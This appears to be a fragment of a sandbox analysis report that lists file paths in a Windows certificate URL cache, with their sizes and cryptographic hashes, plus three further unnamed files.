SHA256dd23942e38a8b2fb20955410dcdb7476a23dc789f5bb879e007cbb71592bb797
SHA5125958ef82b03921fbfa2b62644893796264da16ef0f04f13b3439e9c8dfb4087d8ef844eb3628ee98a95c743f7755d222eecf1531d8fdfe024f962f8e213c9661
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD596a61810a2954d43112fbd2355f1e1ab
SHA1c2fdc5cbdabff9a545695591a39c56ba6445deae
SHA2563080808c609bbfeb0005337796dd385e8573d828474648ab15d2750dc06bcf71
SHA5129586f83d483e8a01c55377a49228f873cb7381400e697118ebdd9a9105436d96a162e72bbea68e5422771ee18d9fd9c59f659176691ed24f9967285588160783
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e7a54d0f63071af98d56c5ea411f16af
SHA1eda5b0ea8a5ae5487597cd06fe6783dcd55ce02d
SHA256fe580fd1062cf659395136adeaa1cd5256cbbdf9f66cd4207db8abef19711805
SHA512db87412f06b25bbf2142f7e65230423e14935b6361a7ef72d50b7cadab254bc735339fa598cc71e4462213ae63b612efefbc683c15147c09c3d8a26cc053df9a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5166dc8045e77e75e6151a66cd1501587
SHA1e1cdb80fa379ce777a4f381643d458200637e6bd
SHA2563d1bf1cd29d98cb8012561655577777804208aad39cc1f8c4d8b90f60b5d0319
SHA512545cecc287aec41fc8dcd643c041d2ed609444ae26d4522ea63b64dd59503fb0aa2265243e9df4d80e9da38b83d4a3d25644b794462f1712f055f18662fcd35d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD57dfae5c8057bb236e2227570c4049473
SHA153d69de52ed05257ec66bf6c9d7db6895ecaffa3
SHA2566b9abaf145b11fb073ad069e7c46270636f912025814f67fed19bda5487651e6
SHA5126b0c89b1893472948ae100bc7073264ebc7d8a4b398afab7b5c44e1f16fb7ba972a41283c213c59fa1d6926585ec45d0845ca2345e958e6bf418cb8bb5bc8623
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD53e5ded9247986c3eda151c05e890ee06
SHA1cafdd80b8bd2607a4dfa886174a0ffd15665e24a
SHA2568bd0b8cd94cb3a30172dbf9b32bb3bd1802d7df1af5923c84bc47f528a83f414
SHA512709cdc368f7b2a2dd15a5d69a2c70c55160b7e5bd14fa05c59543a38f85e941cf2889c5c1834927decde767c29e2dd0c75a77905aa78bf6486000e848a7e2642
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5125dcd336916c6714556f4340ab75fac
SHA186e58605168323e172353c797b73b04a75ecc49b
SHA256863009ad7c9dd47a056dddd0991d5bb59ff378f30372816e1bd18bf49ac5ed7f
SHA5123e92bcd07daf50a87b64794481fbebafd1e09c6fcc3ed6f190a4c8a2087f3e8a1bfb62626858b65b0db963633fdb3a26ac2ef8bbafff3d3b21789e5012f48dde
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD54039bfae5cea02881de5d05a0d730f35
SHA172da55ffd9ea4a3ce9424c3125e95b5a64780bfd
SHA256d9d3840d253ec5a5185bd7546fb5802382c6c0f5f2cfba2ad921d567da368ab7
SHA51251d465236671363ab5b51b2de35bb75e1b603c66279cf986bebeaf850edf5244c4dd052b30903ff3a66f582a3dc6ce4d76a0d7a7a42b65c32fbdbf2a54482fe8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5773abc9c0aaf8d2618082012e2658914
SHA127ba56a9f54df0ff364ccea7e1d0bad0b830cb4a
SHA2568d5ef440b7721639f85870efb4979d3fe6b84819bf03af290b89aebce41fc38a
SHA51212cc260cf90d5e9f495f01d425b7978a7a57dff9ec6dd4429b1a31376ce29aad2fa70edfb4123d03b20b250a58fe683cf23a1a1f1cecd05461bdc8cc34393464
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD597c1c3300561f8762fd258db845d2228
SHA1f1b04cc7e517a4f6d2b375d48d029d9e99212c12
SHA2565aa4c4df8fc2215678c587400e15f7bf175101d0124390516f21527f207fd727
SHA51282a0118f4620339a4470f95e5f7aa8efd0b974f469ec72334dad4a1e2009e3e9e1cd5df4ae599c4d0e0e02d19c3b7116cddcaa18a092e6ed0da46e41b6ccf824
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD53981d78abf70a2ca8e800cb46c30eb6a
SHA113cbddf022f7f63e2e02fc81ec90dec505a208d0
SHA256c7bcaf0e192f0f887eb41efd9ec198d3e482564cda6eaedf279feb6748352d3a
SHA512b8dff29aeb3b4366cacc3906752e6a29b87d81b887016d49a4667f0bf3fcbefc4c8b6221e01cf1bd2c6a08ed229835daa36b1f2e8c8de06b6ea15ee6ca322c99
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5906b86edb7c18cdd513f5f276c12ab8e
SHA1f769da38a400ee553f74c2c94248ccfcbf3aee02
SHA256f6e4dd4c960965d3ef972f2a5984a8e537d7a0380393ac93ecc6ea8fa533d342
SHA5122152816ef128174aa8fd407b32279922a0bb9aec837a5b5a26ece28585c8a4cab9641f7a6df7d94ceb2f2a2a6af08229f86754f6f369800ad4b4a221bb7f441f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58b8219f9af1179145e849631b7f3122f
SHA10097252c88a416588f4fc51b2e362795e33890f0
SHA25692a4f43e9a08f1cf33a4dd1ee5d2f0d4692b7e331949632894e647ed79328228
SHA512fbffb245258e578d41f3531ed56addae2f22867c0d0c81db910e9c9717cccfa721cd1e15d01a75db9c1d62af8eb569c018430664e40acf8fa4ab1190c38c7ec6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52d87ea0afc491a326766c38998a84daa
SHA1ae255b762f82753c470623e630691fda64a90e57
SHA2568408cc2f69d07af2ce4c5e35a2e82ed6602a84b8587b9a7f5d4863495f915f3d
SHA5129f23cfcf07afaaed0856f9cfe76f669e2e7c4294e3cab3f8c4d16914d5299936736187cbe296b1415d7934aa6c0a317eaaa20f721904df9c5add225704bc1f0f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50e310a80957bb77fe140ce7c7fb89d79
SHA1430d1d99aee18fdcbec58125f4a057dca9e63f3a
SHA2562938f3bce640f549bc6b4504ebe4da6867e4979e83320887717af6310dbfe2df
SHA5122f39747342220fe2c6a9fa8558e27ca4ed7ea0274d25c4f58947302a9c5ae78a9ad0a53d68786a43f201bb98b7c024506b306ff46d14e1306ba20ab701a5739c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD55567c4ec2b2753b70ac462f77d825d88
SHA136b90d1d24d301bf7b380616c08ecf1a7ac11602
SHA25639dff64473450212cf34d7421208b3f0663470b807caa03fbd36aa27b742b57f
SHA512b027e4f9555a7afadc64cb0fb7f3cfe8bddca15e9a22deafd449643633543df0102dbb999620351f57e1d7772e6ddbb3ee552a4f378b05fd5bd53af46c4acc45
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
306B
MD5154b54da0532f06d78997442ad648d45
SHA11087a477ec4815eade97d338743ce63361e5f09b
SHA2564f72eeaf5d050f5077a82782d7dfbceed38448b1569836f8b0550dcd3080574d
SHA51264bc9c808251aa272352cef3d74620974f962fbc5d511474a8f8ea0393aa43a76a0ebf8b3877d5f3ccaa4b9c7e25c98793b0cad8928d68cc4a0a9bcc99c5fe2c